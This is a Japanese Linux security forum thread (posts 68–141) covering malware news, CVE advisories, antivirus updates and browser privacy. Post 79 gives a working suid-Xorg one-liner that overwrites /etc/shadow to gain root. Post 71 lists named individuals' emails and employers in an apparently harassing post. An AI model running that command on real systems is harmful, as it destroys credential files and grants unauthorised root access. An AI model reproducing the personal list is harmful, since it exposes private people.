Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net (469レス)
Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net http://mao.5ch.net/test/read.cgi/linux/1465741067/
上
下
前
次
1-
新
通常表示
512バイト分割
レス栞
68: 66 [sage] 2017/07/05(水) 00:22:13.88 ID:uEgHtGC3 >67 ありがとう。 次回からそうするわ。 ちなみに、今回のは下記参考に自己解決したっぽい。 -md md5付けたら、現行1.1.0でもファイル開けました。 https://github.com/fastlane/fastlane/issues/9542 https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant http://mao.5ch.net/test/read.cgi/linux/1465741067/68
69: login:Penguin [sage] 2017/09/07(木) 19:37:24.22 ID:NhVQ+S22 すまん誰か教えてくれ! 全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、 設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い? http://mao.5ch.net/test/read.cgi/linux/1465741067/69
70: login:Penguin [sage] 2017/10/16(月) 19:17:31.78 ID:AvEU8VfP 。o0○( zzzz… ) _,,..,,,,_ / ,' 3/⌒ヽ-、_ /l. /____/  ̄ ̄ ̄ ̄ ̄ ̄ ̄ http://mao.5ch.net/test/read.cgi/linux/1465741067/70
71: login:Penguin [] 2017/11/03(金) 21:09:20.77 ID:UMEHXcXh 【 日立製作所 】焦土戦 セキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。 新名主 隆志 TIS shimmyozu.takashi@technopro.com 色田 眞吾 日立製作所 Shikita.Shingo@technopro.com 八木 一暢 TIS yagi.kazunobu@technopro.com 水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com 佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com 佐々木 健太 日立製作所 sasaki.kenta@technopro.com 中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com 永井 真祐子 富士ソフト nagai.mayuko@technopro.com 品川区高輪3-25-33 都内のトイレに花子さんだ 日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。 http://mao.5ch.net/test/read.cgi/linux/1465741067/71
72: login:Penguin [] 2017/12/29(金) 13:14:18.48 ID:S/CsVkMC 誰でも簡単にパソコン1台で稼げる方法など 参考までに、 ⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。 グーグル検索⇒『宮本のゴウリエセレレ』 HRT6GIPYTB http://mao.5ch.net/test/read.cgi/linux/1465741067/72
73: login:Penguin [sage] 2018/04/11(水) 07:03:34.17 ID:9VtMkuZE 。o0○( zzzz… ) _,,..,,,,_ / ,' 3/⌒ヽ-、_ /l. /____/  ̄ ̄ ̄ ̄ ̄ ̄ ̄ http://mao.5ch.net/test/read.cgi/linux/1465741067/73
74: login:Penguin [] 2018/05/22(火) 11:10:27.97 ID:Czl6p0FW 僕の知り合いの知り合いができた副業情報ドットコム 関心がある人だけ見てください。 グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』 BTBIK http://mao.5ch.net/test/read.cgi/linux/1465741067/74
75: login:Penguin [] 2018/05/26(土) 09:20:44.99 ID:c6Ml0Dod 【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か http://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50 http://mao.5ch.net/test/read.cgi/linux/1465741067/75
76: login:Penguin [] 2018/05/26(土) 12:43:59.58 ID:H0+abEbN 大問題じゃないか http://mao.5ch.net/test/read.cgi/linux/1465741067/76
77: login:Penguin [sage] 2018/05/27(日) 16:31:34.31 ID:QzfBv+yQ Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題w http://mao.5ch.net/test/read.cgi/linux/1465741067/77
78: login:Penguin [sage] 2018/07/08(日) 20:50:42.96 ID:QTYf4jMn 。o0○( zzzz… ) _,,..,,,,_ / ,' 3/⌒ヽ-、_ /l. /____/  ̄ ̄ ̄ ̄ ̄ ̄ ̄ http://mao.5ch.net/test/read.cgi/linux/1465741067/78
79: login:Penguin [sage] 2018/10/31(水) 11:46:41.86 ID:XLo7vX23 suid付きXorgを使ったroot昇格法 https://www.exploit-db.com/exploits/45697/ cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su xorgはフォントパスのリストをそのままログに書き込むことを利用してる (shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ) http://mao.5ch.net/test/read.cgi/linux/1465741067/79
80: login:Penguin [sage] 2019/03/10(日) 12:39:41.95 ID:BHkfBLF0 i"\ )) | 8 ) ∧,,,∧∩-''" _ ..(´・ω・`)彡 おぱんつ おぱんつ ! ! 〃(\ ∞ ,⊂彡 `ヽ)_ノ| | し⌒J http://mao.5ch.net/test/read.cgi/linux/1465741067/80
81: login:Penguin [sage] 2019/05/24(金) 01:31:09.68 ID:WQ5DwMzT 彡⌒ ミ ( ´ ・ω・) 呼んだ ? http://mao.5ch.net/test/read.cgi/linux/1465741067/81
82: login:Penguin [] 2019/05/31(金) 12:30:43.06 ID:bdQbsGXY Linuxを狙うマルウェア「HiddenWasp」に注意 2019/05/31 06:55 後藤大地 https://news.mynavi.jp/article/20190531-833791/ Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を 発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。 このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。 ・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に リモートコントロールするために開発されている ・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が 高い ・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア から大量のソースコードが流用されている ・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能 性が低いと見られる Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が 低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、 注意が必要。 http://mao.5ch.net/test/read.cgi/linux/1465741067/82
83: login:Penguin [] 2019/06/01(土) 00:37:42.11 ID:/N3jDoCj >>82 これはひどい 俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、 Linuxにはこれがないからな SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?) RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ? http://mao.5ch.net/test/read.cgi/linux/1465741067/83
84: login:Penguin [] 2019/06/01(土) 03:51:20.70 ID:BeN0lDY7 Linuxだから安全です。 http://mao.5ch.net/test/read.cgi/linux/1465741067/84
85: login:Penguin [sage] 2019/06/01(土) 08:23:33.96 ID:0WGBvA8D ウィルス検体を各所に送り対応が早いとこは半日だったが ノートンは3日後だったことがあった http://mao.5ch.net/test/read.cgi/linux/1465741067/85
86: login:Penguin [sage] 2019/06/01(土) 23:05:01.15 ID:aQmSSgBv >>83 毎日更新してるんじゃないかな ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。 http://mao.5ch.net/test/read.cgi/linux/1465741067/86
87: 83 [] 2019/06/02(日) 01:29:08.34 ID:Zexh2AIq $ sudo /opt/sophos-av/bin/savupdate 次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63 Updating Sophos Anti-Virus.... Updating SAVScan on-demand scanner Updating Virus Engine and Data Updating Manifest Update completed. 次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63 sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました $ sudo /opt/sophos-av/bin/savdstatus --version Copyright 1989-2018 Sophos Limited. All rights reserved. Sophos Anti-Virus = 9.15.1 ビルドのリビジョン = 2793374 脅威検出エンジン = 3.74.2 脅威データ = 5.63 検出脅威数 = 35620036 脅威データリリース日 = 2019年05月07日 00時00分00秒 前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒 と脅威データリリース日がずっと5/7のままなんだよね これでも最悪1日毎には更新してるのかね? ノートンだと1時間に1回は更新してるっぽいけど 更新しててくれてると助かるのだが http://mao.5ch.net/test/read.cgi/linux/1465741067/87
88: 83 [] 2019/06/02(日) 01:30:11.25 ID:Zexh2AIq >>85-86へね http://mao.5ch.net/test/read.cgi/linux/1465741067/88
89: 83 [] 2019/06/03(月) 00:52:09.01 ID:LINEVdyy >>85-86 ここ見たらやはり1日1回ぐらいは更新されてそう 実際俺のSophosは普通に6/2更新されてた どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と ウイルス定義ファイル更新日は違うらしい ウイルス定義ファイル更新日もちゃんと書けよ>Sophos Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法 https://community.sophos.com/kb/ja-jp/121984 http://mao.5ch.net/test/read.cgi/linux/1465741067/89
90: login:Penguin [] 2019/06/03(月) 02:02:29.21 ID:jJq3PPoG 野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。 http://mao.5ch.net/test/read.cgi/linux/1465741067/90
91: login:Penguin [] 2019/06/03(月) 02:06:37.36 ID:jJq3PPoG しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。 世に知れ渡っていないウイルスが仕込まれていた場合に ウイルス検知ソフトがそれを正しく検出してくれることはまれ。 何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。 でもダウンロードあと、そこまで待ってインストールする人はいない。 http://mao.5ch.net/test/read.cgi/linux/1465741067/91
92: login:Penguin [sage] 2019/06/03(月) 08:05:48.00 ID:eMJGOUo4 >>82 これの元記事によるとvirustotalで引っかからない https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png つまりノートンだろうが何だろうが脅威としないで放置されるということ 感染経路はわからんが野良危険ということだろう http://mao.5ch.net/test/read.cgi/linux/1465741067/92
93: login:Penguin [sage] 2019/06/03(月) 22:51:46.35 ID:sgwkICkl >>82 これは具体的にどう注意したらいいんだ? http://mao.5ch.net/test/read.cgi/linux/1465741067/93
94: 83 [] 2019/06/03(月) 22:56:08.11 ID:LINEVdyy やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな ↓となってるから(途中に更新あったかは知らんが多分ないだろ) 昨日 <published>2019-06-02T13:03:35</published> 今日 <published>2019-06-03T13:07:34</published> http://mao.5ch.net/test/read.cgi/linux/1465741067/94
95: login:Penguin [sage] 2019/06/04(火) 11:45:07.22 ID:JnEdCGFR ソフォス個人情報入れないとダウン出来ないの? http://mao.5ch.net/test/read.cgi/linux/1465741067/95
96: 83 [] 2019/06/04(火) 23:57:45.16 ID:8eAlB9kG >>95 全部、適当に入れればいいよ メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫 http://mao.5ch.net/test/read.cgi/linux/1465741067/96
97: login:Penguin [sage] 2019/06/05(水) 09:35:56.10 ID:2u//H+UO 電話番号とか住所も? http://mao.5ch.net/test/read.cgi/linux/1465741067/97
98: login:Penguin [] 2019/06/05(水) 21:45:09.38 ID:1PL8mpQb 電話番号、住所って書く欄あったっけ? あったとしても、100%適当で通るよ 役職・法人名も適当でおk 国、県、郵便番号は日本、東京、1000000でおk ちなみにLinux版はこれね https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ http://mao.5ch.net/test/read.cgi/linux/1465741067/98
99: login:Penguin [sage] 2019/06/06(木) 13:34:15.13 ID:Vt0/9sNy >>98 都道府県がなぜか受け付けてくれない http://mao.5ch.net/test/read.cgi/linux/1465741067/99
100: login:Penguin [] 2019/06/06(木) 20:22:08.58 ID:yFuR+pcY >>99 先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ 国名: 日本 都道府県:Tokyo 郵便番号:100-0000 で大丈夫だよ http://mao.5ch.net/test/read.cgi/linux/1465741067/100
101: login:Penguin [sage] 2019/06/07(金) 09:06:17.12 ID:boyNvVP0 >>100 ▲▼が出てこない http://mao.5ch.net/test/read.cgi/linux/1465741067/101
102: login:Penguin [] 2019/06/07(金) 20:09:33.53 ID:/Sk2vmHZ ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ オフになってるんじゃない? http://mao.5ch.net/test/read.cgi/linux/1465741067/102
103: login:Penguin [sage] 2019/06/07(金) 21:33:16.30 ID:yVEJ6IS3 Symantec Endpoint ProtecitonmpLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな これはちと使えないわ http://mao.5ch.net/test/read.cgi/linux/1465741067/103
104: login:Penguin [] 2019/06/07(金) 23:40:08.48 ID:/Sk2vmHZ Symantecのって無料版あったっけ? http://mao.5ch.net/test/read.cgi/linux/1465741067/104
105: login:Penguin [] 2019/06/08(土) 02:35:25.81 ID:/huWGbTD Symantec Endpoint Protection for linux良さそうだが、 1年間9500円アップグレード4700円って高いな ライセンスだけでメンテナンス不要版もあるの? 値段はここの43ページ https://www.symantec.com/content/ja/jp/micro_partner/Sales_guide_SEPSPS_14_2013Feb.pdf http://mao.5ch.net/test/read.cgi/linux/1465741067/105
106: login:Penguin [sage] 2019/06/10(月) 15:44:13.86 ID:9N/TTeW/ LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか? ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。 UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。 オープンソースで誰か作ってくれないかな・・・ http://mao.5ch.net/test/read.cgi/linux/1465741067/106
107: login:Penguin [sage] 2019/06/18(火) 02:35:54.34 ID:AVJfVicP マイクロソフト、Azure顧客にEximワームに注意を呼びかけ Catalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分 https://japan.zdnet.com/article/35138550/ Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の Azureも影響を受けるとしてAzure顧客向けに警告を出した。 このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、 CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用 されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る ことができるというものだ。 ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を 広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。 Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし 送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。 Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を 敷いているとMicrosoftは述べている。(後略) http://mao.5ch.net/test/read.cgi/linux/1465741067/107
108: login:Penguin [sage] 2019/06/18(火) 17:26:10.39 ID:6P/bvjY8 Netflix報告: Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599) 2019年6月18日 05:11 Kazuki Omo https://security.sios.com/vulnerability/misc-security-vulnerability-20190618.html こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。 06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。 今後も情報が出てくると思われますので、こちらで取り上げます。 逐次情報は更新していく予定です。 http://mao.5ch.net/test/read.cgi/linux/1465741067/108
109: login:Penguin [] 2019/06/22(土) 09:34:44.67 ID:BWxAJ8Sj >>108に関連して、アップデートが大量に来ている。 また、 ◆snapアプリのアップデートはaptコマンドでは不可能である。 初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ) (1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。 $ sudo apt update (2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。 $ sudo apt -y upgrade ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。 「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。 (3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。 $ sudo apt autoremove $ sudo apt autoclean (4)次にsnapアプリの更新を行う。 $ sudo snap refresh snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。 GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。 出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。 http://mao.5ch.net/test/read.cgi/linux/1465741067/109
110: login:Penguin [sage] 2019/07/03(水) 23:55:13.69 ID:OptOlEBI >>1 Linuxなんて使わない。 以上。 http://mao.5ch.net/test/read.cgi/linux/1465741067/110
111: login:Penguin [sage] 2019/09/29(日) 21:20:57.29 ID:Nip3Jzi1 彡⌒ミ (,,・_・).。oO( 毛深くなりたい・・・ ) ヾ(,_uuノ http://mao.5ch.net/test/read.cgi/linux/1465741067/111
112: login:Penguin [] 2019/10/13(日) 01:09:29.50 ID:ueikBXbu Google、Androidアプリでアップデートを各ユーザーに強制する方法を発表 | TechCrunch Japan https://jp.techcrunch.com/2019/05/08/2019-05-07-android-developers-can-now-force-app-updates/ http://mao.5ch.net/test/read.cgi/linux/1465741067/112
113: login:Penguin [sage] 2019/10/25(金) 00:20:33.72 ID:j4GkuklA >>6 それ違う 負けないためには、だね コモドでいいよな? http://mao.5ch.net/test/read.cgi/linux/1465741067/113
114: login:Penguin [] 2019/12/12(木) 00:50:01.16 ID:jaG34Ck9 IntelのCPUに脆弱性 [402859164] https://leia.5ch.net/test/read.cgi/poverty/1576065630/ 供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan https://jp.techcrunch.com/2019/12/11/2019-12-10-plundervolt-attack-breaches-chip-security-with-a-shock-to-the-system/ Plundervolt https://plundervolt.com/ 17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0 電圧変えて何すんのよ システムダウン? 19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM >>17 プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた 26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a >>17 エラーが起きたと思って秘匿領域のデータをダンプするんだってさ http://mao.5ch.net/test/read.cgi/linux/1465741067/114
115: login:Penguin [] 2019/12/12(木) 02:35:29.36 ID:QpDguOY0 Linuxだから安全です。 http://mao.5ch.net/test/read.cgi/linux/1465741067/115
116: login:Penguin [] 2019/12/12(木) 19:43:32.89 ID:jaG34Ck9 >>114続き 44 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2] >1>19>26 なにこれ? PC起動してないとCPUコントロール出来ないよね? もしかして、ハードディスク暗号化してるPCを起動して、 暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか? >プロセッサ内で隠蔽されている暗号鍵 >秘匿領域 ここに何が格納されてるのか分からん スーパーハッカー解説お願いします。 54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0 >>44 ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、 この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる 63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a >>51 電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので UHD-BDの暗号化解除機構に使われてるんやで 55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2] >>54 それは結構やばいなあ まあ、暗号化解除前では意味なさそうなのが救いだな てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの? http://mao.5ch.net/test/read.cgi/linux/1465741067/116
117: login:Penguin [sage] 2019/12/13(金) 19:09:08.80 ID:ESmGY9a7 >>115 コアダンプしそう http://mao.5ch.net/test/read.cgi/linux/1465741067/117
118: login:Penguin [sage] 2019/12/13(金) 19:14:21.26 ID:ESmGY9a7 Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね 流石にそこまで早くないか http://mao.5ch.net/test/read.cgi/linux/1465741067/118
119: login:Penguin [] 2019/12/16(月) 00:27:12.94 ID:Oy6287lw MicrosoftがUbuntu用のDefender出すんだって? http://mao.5ch.net/test/read.cgi/linux/1465741067/119
120: login:Penguin [] 2019/12/16(月) 05:28:15.87 ID:AxOoqKNy LinuxサーバーはAzureしか選択肢が無くなったかもかも。 http://mao.5ch.net/test/read.cgi/linux/1465741067/120
121: login:Penguin [] 2019/12/16(月) 06:38:47.87 ID:AxOoqKNy iOSもカバーしてるからAzureが本命かもしれないよ。 WSLがどうでも良いわけじゃないだろうけど。 http://mao.5ch.net/test/read.cgi/linux/1465741067/121
122: login:Penguin [sage] 2019/12/16(月) 20:16:03.60 ID:F52Y2AF9 >>119 MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに 追いかけてくるってか... http://mao.5ch.net/test/read.cgi/linux/1465741067/122
123: login:Penguin [] 2019/12/17(火) 02:23:31.85 ID:eJqKdH1L >>122 MSってそんな個人情報抜いてるの? Skypeで抜いてるのにはびびったが。 あれはそこそこ信用してただけにびっくりした。 Skypeごときの情報抜かないだろうって思ってた。 MSってGoogle並みに個人情報抜いてるの? Googleは怖くて使えんわ あんなの住所氏名電話番号全部バレてるだろ http://mao.5ch.net/test/read.cgi/linux/1465741067/123
124: login:Penguin [sage] 2019/12/17(火) 03:54:51.93 ID:+GuS9PLu くこの板の一部の信者はMSに親を殺された!とかわめいてるけど、実はgoogleの方がヤバいっていうね http://mao.5ch.net/test/read.cgi/linux/1465741067/124
125: login:Penguin [sage] 2019/12/17(火) 07:05:33.11 ID:BN1fWjc1 ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple http://mao.5ch.net/test/read.cgi/linux/1465741067/125
126: login:Penguin [sage] 2019/12/17(火) 10:14:03.65 ID:d36jgmOT 最近はWindowsのアカウント作る時にできるだけMSアカウントを 作らせるよう誘導してくるな Win8あたりからだった記憶があるけど、Win10が大型アップデート するたびにどんどん露骨になってる印象 http://mao.5ch.net/test/read.cgi/linux/1465741067/126
127: login:Penguin [sage] 2019/12/17(火) 10:37:04.71 ID:h64x6iyX たしかに。 http://mao.5ch.net/test/read.cgi/linux/1465741067/127
128: login:Penguin [sage] 2019/12/17(火) 21:04:10.21 ID:IhVBQ6dn OS以外のファイルはゴッソリ抜かれてるのに Windows10とかOffice365とか無思慮に まして仕事で使ってるヤツの気が知れんわ http://mao.5ch.net/test/read.cgi/linux/1465741067/128
129: login:Penguin [sage] 2019/12/17(火) 21:15:21.09 ID:486GIvh4 チョロメや考えなしに派生したクロを入れるのも 泥棒の手を引いて家ん中案内するようなもんだしね http://mao.5ch.net/test/read.cgi/linux/1465741067/129
130: login:Penguin [sage] 2019/12/18(水) 13:16:10.19 ID:b8AkMopr どれ使うのがええのん? opensuseとfirefox? http://mao.5ch.net/test/read.cgi/linux/1465741067/130
131: login:Penguin [sage] 2019/12/18(水) 20:51:19.26 ID:ng+ewP2B 俺はwinの時sandboxie上でcookieや履歴の設定をユルユルにしたfirefox使ってweb見終わったら丸消ししてたんだが ubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる 多少手間だが これならいくらcookieやcanvas喰おうが いつもキレーなブラウザでインターネッツできると思ったんだけどね 砂箱スレでdockerもススメられたけど dockerはなんか違うかな?と思ったわ http://mao.5ch.net/test/read.cgi/linux/1465741067/131
132: login:Penguin [] 2019/12/18(水) 23:21:12.25 ID:Ghj3q23V 【緊急警告】Google Chrome、Windows PC上の事実上全てのファイルを恒常的にスキャン https://hayabusa9.5ch.net/test/read.cgi/news/1522897669/ http://mao.5ch.net/test/read.cgi/linux/1465741067/132
133: login:Penguin [sage] 2019/12/19(木) 13:08:27.51 ID:eQXTO88z >>130 firefoxに余計な機能をブロックするuser.jsを育てたものを使ってる デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる… GNUのicecat(firefox系)も良い感じ >>131 firejail --private=<専用の一時ホームディレクトリ> とか? canvasは個別に対応が必要だと思う http://mao.5ch.net/test/read.cgi/linux/1465741067/133
134: login:Penguin [sage] 2019/12/19(木) 15:29:49.65 ID:hhS7ytBr >>133 user.jsは一時期手を出してみたけど「これワザとやってんじゃないの?」っていうくらい あの設定ワードって言うの? about:configで左側に表示されるワードが 余りに頻繁に変更されるんで 根負けしてバンザイしたわ >canvasは個別に対応が必要だと思う とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ やっぱ色々と設定いじった方がいいもんなの? http://mao.5ch.net/test/read.cgi/linux/1465741067/134
135: login:Penguin [sage] 2019/12/20(金) 02:13:31.46 ID:3v00n4yQ operaやvivaldiはどんな評価やろ http://mao.5ch.net/test/read.cgi/linux/1465741067/135
136: login:Penguin [sage] 2019/12/20(金) 08:11:46.30 ID:W5p7NQnV GoogleがChromeやFirefox以外のブラウザを弾くようになって無理 http://mao.5ch.net/test/read.cgi/linux/1465741067/136
137: login:Penguin [sage] 2019/12/20(金) 20:28:03.18 ID:BMpjrsOC つ参考 Browser Fingerprinting対策ツールの評価(pdf) https://ipsj.ixsq.nii.ac.jp/ej/?action=repository_uri&item_id=187815&file_id=1&file_no=1 Web Browser Fingerprint解説ページ https://www.saitolab.org/fp_site/ http://mao.5ch.net/test/read.cgi/linux/1465741067/137
138: login:Penguin [] 2019/12/21(土) 16:40:49.62 ID:P2W6B/wx まじで教えてチョメ クロ 危ないんですか? 火狐は大丈夫なら 前2者は早速削除したいと思います。 http://mao.5ch.net/test/read.cgi/linux/1465741067/138
139: login:Penguin [] 2019/12/21(土) 16:56:46.98 ID:P2W6B/wx Sicklylifeさんはファイアーウオールは有効にしなくてもよい とありますので、設定していませんが、入れれば幾らかでも 安全になるのでしょうか http://mao.5ch.net/test/read.cgi/linux/1465741067/139
140: login:Penguin [sage] 2019/12/21(土) 20:37:04.76 ID:8u1F/kP3 >>138 Linux用ブラウザーを狙う奴なんていないから心配すんな。 あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。 >>139 例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、 すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。 よく分かんないなら、とりあえずファイアーウォールは有効にしとけば? http://mao.5ch.net/test/read.cgi/linux/1465741067/140
141: login:Penguin [sage] 2019/12/21(土) 21:33:25.68 ID:2yt7G6Gl >>138 チョロメが個人情報泥棒ブラウザなのは周知の事実 何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ Win版のチョロはアンインストールしても 泥棒機能はOSの深いトコで生き続けるらしいから もし無しにしたいのならOSの入れ直ししかねーんじゃね? そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが? ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね? http://mao.5ch.net/test/read.cgi/linux/1465741067/141
